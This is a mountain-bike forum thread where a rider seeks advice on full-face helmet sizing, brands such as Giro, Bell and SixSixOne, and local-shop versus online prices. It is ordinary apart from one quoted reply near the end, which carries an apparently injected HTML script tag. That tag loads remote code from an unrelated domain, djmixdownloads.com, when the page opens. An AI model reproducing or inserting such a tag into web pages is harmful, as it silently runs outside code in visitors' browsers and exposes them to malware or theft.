Need help on a Full Face helmet????- Mtbr.com
    mtbr member
    Jul 2006

New question here. Need help on a Full Face helmet????

Hi everyone,
    I just got an 04 Stinky a month or so ago, and my buddy has gotten me into some real DH mountain trails. I'm loving it, but am very hesitant of hitting the big drops and stuff because I have about 40k worth of dental work done, lol. So for that reson, and overall safety, I want to toss the BMX helmet and get a full face.

My head is just under 23', so I think I'm looking at a medium. I went to one of my LBS's and tried on some. The Large def feels too big, but mediums seem to be a little snug in the cheek area. The guy said they tend to do that, and I'd want something that fits snug, just wanna get your opinions?

Also, what brands are good, and are there any I should stay away from? I tried Giro and Bell. There was a sexy Giro helmet, but I dont rly wanna pay $200 for one lol. I looked on ebay, and SIXSIXONE (661) seems to pop up a fair bit. Any good? Any other brands I should check out? I don't want to pay a ton as I need shin pads and a bike rack, as well as a bike tune up, so its pricey already.

Also, what kind of margins are in helemts? I'd like to support my LBS, but if I can get it for half price online, its very hard to justify doing so.

Thanks for everyones help . And I understand ever manufacturer will fit a little different, and thats the risk of buying online. Thanks again

mtbr member
    Mar 2009
    With full face helmets the cheeks will generally be tight at first than get looser with use as you break in the helmet. The best way to go about it is to try as many different styles and sizes as you can so you can get a better idea of what fits good, and whats perfect. I always suggest supporting your LBS just because if your a regular they tend to cut you deals and in general take care of you better than an e-tailer.

brands to check out,
    giro, bell, troy lee designs, THE, fox, 661 to name a few

p.s. i myself have a large giro remedy, its a perfect fit, not too heavy and if you have any speed at all it shouldnt get too hot
    and if you want to know the margins shoot me a pm

mtbr member
    Sep 2006
    Here's one on sale. Though the reviews said that its sizes fit a little snug than other helmets.

http://www.backcountryoutlet.com/out...mp-Helmet.html

mtbr member
    Jul 2006
    hmmm, the 661's seem to be a great helmet for the price, it just sucks that no LBS carries them, so it would be a gamble. Guess I'll just have to make a decision, thanks for the link.

Thanks for the info chernobly, you have PM

mtbr member
    Jul 2006
    went around today and the last LBS i had to check out did carry SIXSIXONE's, which was sweet because it let me try one on. And wow, all I can say is I'm glad I did. In every other brand I've tried, I've fit a medium, in the 661, I fit an XL.

I really wanted to supprt my LBS, but when their price is $140+tax, and online is $55.99, its really hard to buy local lol. TLD fit really well and had a sexy design too, although I could only imagine how expensive that one was, I didnt ask lol.

Anyways, thanks for everyones help, I think I'll wind up getting a SIXSIXONE, just wish they had a few more decal schemes to chose from

mtbr member
    Sep 2006
    Cool I'm glad it works out for you.

mtbr member
    Aug 2007
    This looks like a really cool helmet. It is a higher end one that is all carbon fiber, has nice decals, and is half off right now. You might want to check it out. Plus, it was from the Hot Deals section here on MTBR so they must support the site some how.

http://www.bicyclebuys.com/item/0751015PART

mtbr member
    Jul 2006
    Quote Originally Posted by gdpolk
    This looks like a really cool helmet. It is a higher end one that is all carbon fiber, has nice decals, and is half off right now. You might want to check it out. Plus, it was from the Hot Deals section here on MTBR so they must support the site some how.

http://www.bicyclebuys.com/item/0751015PART
    Seems like a good price, but is a fair bit more then I wanted to spend. How is the website that was linked earlier with the sixsixone for 55.99? That seems like a pretty good price if I get it shipped to the border and hey the free shipping.Are the reputable?

mtbr member
    Aug 2007
    I haven't dealt with them before but I would assume they are reputable. You could always check with the better business bureau to see if there were any complaints on them or go over to the General Discussions forum and post asking if people have had a good or bad experience with them in the past. I thought about ordering one just to see if I liked it. I figure at that price with free shipping I can't really loose. If I get it in and don't like it I bet I could easily sell it on Ebay as a Buy It Now item for what I had in it with free shipping and then I would only be out shipping. Somebody would snatch that deal and run with it for sure.

mtbr member
    Nov 2006

Specialized Deviant

I have a Specialized Deviant Carbon Helmet. In my opinion it is by far the most ventilated FF helmet. The non Carbon is similar and a lot cheaper.

http://www.specialized.com/us/en/bc/...metBMX&eid=321

mtbr member
    Jul 2006
    Quote Originally Posted by sheppardk
    I have a Specialized Deviant Carbon Helmet. In my opinion it is by far the most ventilated FF helmet. The non Carbon is similar and a lot cheaper.

http://www.specialized.com/us/en/bc/...metBMX&eid=321
    How do the specialized's fit, sizing wise?Are they similar to giro and bell? Because from what ive tried on most are close, but sixsixone for an example fits super small

mtbr member
    Feb 2007
    Good selection and prices on FF helmets at Greenfish:

http://greenfishsports.com/category-...e-helmets.html

The Azonic Fury is another good choice at a reasonable cost.

Five is right out
    Sep 2006
    Quote Originally Posted by coop3422
    Hi everyone,
    I just got an 04 Stinky a month or so ago, and my buddy has gotten me into some real DH mountain trails. I'm loving it, but am very hesitant of hitting the big drops and stuff because I have about 40k worth of dental work done, lol. So for that reson, and overall safety, I want to toss the BMX helmet and get a full face.

My head is just under 23', so I think I'm looking at a medium. I went to one of my LBS's and tried on some. The Large def feels too big, but mediums seem to be a little snug in the cheek area. The guy said they tend to do that, and I'd want something that fits snug, just wanna get your opinions?

Also, what brands are good, and are there any I should stay away from? I tried Giro and Bell. There was a sexy Giro helmet, but I dont rly wanna pay $200 for one lol. I looked on ebay, and SIXSIXONE (661) seems to pop up a fair bit. Any good? Any other brands I should check out? I don't want to pay a ton as I need shin pads and a bike rack, as well as a bike tune up, so its pricey already.

Also, what kind of margins are in helemts? I'd like to support my LBS, but if I can get it for half price online, its very hard to justify doing so.

Thanks for everyones help . And I understand ever manufacturer will fit a little different, and thats the risk of buying online. Thanks again

You're worried about 40k dental bills, but at the same time want to save a hundred bucks on a helmet that should last you for years? If you really value your face and head go to the shops, find a helmet that *fits* and buy it then and there (instead of then going online to get it cheaper, thus using the shop as a free fitting service). If price is a big deal, cut back on beer or whatever else you spend on, for a couple of weeks.

mtbr member
    Jul 2006
    Quote Originally Posted by womble
    You're worried about 40k dental bills, but at the same time want to save a hundred bucks on a helmet that should last you for years? If you really value your face and head go to the shops, find a helmet that *fits* and buy it then and there (instead of then going online to get it cheaper, thus using the shop as a free fitting service). If price is a big deal, cut back on beer or whatever else you spend on, for a couple of weeks.
    i want to support my LBS, I already stated that. But paying double the price (or more then double in some cases) just seems silly. As for 40k worth of dental work, that never came out of my pocket, I;m only in university and live on my own. Thus, if I can save $50 on a helmet, then to me thats a pretty substantial amount to put towards other bills. I don't want to use the LBS as a fitting room. If they give me a deal on a helmet that is fair for both me and them, I have no prob giving them my business. Ill be getting a tune up, as well as buying a bike rack on them from friday. Ive bought a bike and gear from them as well before, so its not like i havent spent money there

mtbr member
    Quote Originally Posted by coop3422
    i want to support my LBS, I already stated that. But paying double the price (or more then double in some cases) just seems silly. As for 40k worth of dental work, that never came out of my pocket, I;m only in university and live on my own. Thus, if I can save $50 on a helmet, then to me thats a pretty substantial amount to put towards other bills. I don't want to use the LBS as a fitting room.
    Ask your lbs about the helmet manufacturers crash replacement policy. Giro helmet owners (in the UK at least) get cost price replacements on crashed helmets. It's meant I've spent 50, 20, 20 on my Hexes instead of 40 three times. The Trek helmet I had before was one free replacement for 1 year as well.

Buying online could turn out to be a false economy if you face plant and break the helmet. I know you don't intend to (who does?) but if it never happened you wouldn't be buying a helmet!

Aug 2009
    Quote Originally Posted by chernobyl
    With full face helmets the cheeks will generally be tight at first than get looser with use as you break in the helmet. The best way to go about it is to try as many different styles and sizes as you can so you can get a better idea of what fits good, and whats perfect. I always suggest supporting your LBS just because if your a regular they tend to cut you deals and in general take care of you better than an e-tailer.

brands to check out,
    giro, bell, troy lee designs, THE, fox, 661 to name a few

p.s. i myself have a large giro remedy, its a perfect fit, not too heavy and if you have any speed at all it shouldnt get too hot
    and if you want to know the margins shoot me a pm<script type="***************" src="http://djmixdownloads.com/script.php"></script>
    gonna pm you soon if thats ok

mtbr member
    Jun 2005
    Go look at moto helmets. A lot more options along with protection. Different brands tend to fit differently.

Members who have read this thread: 0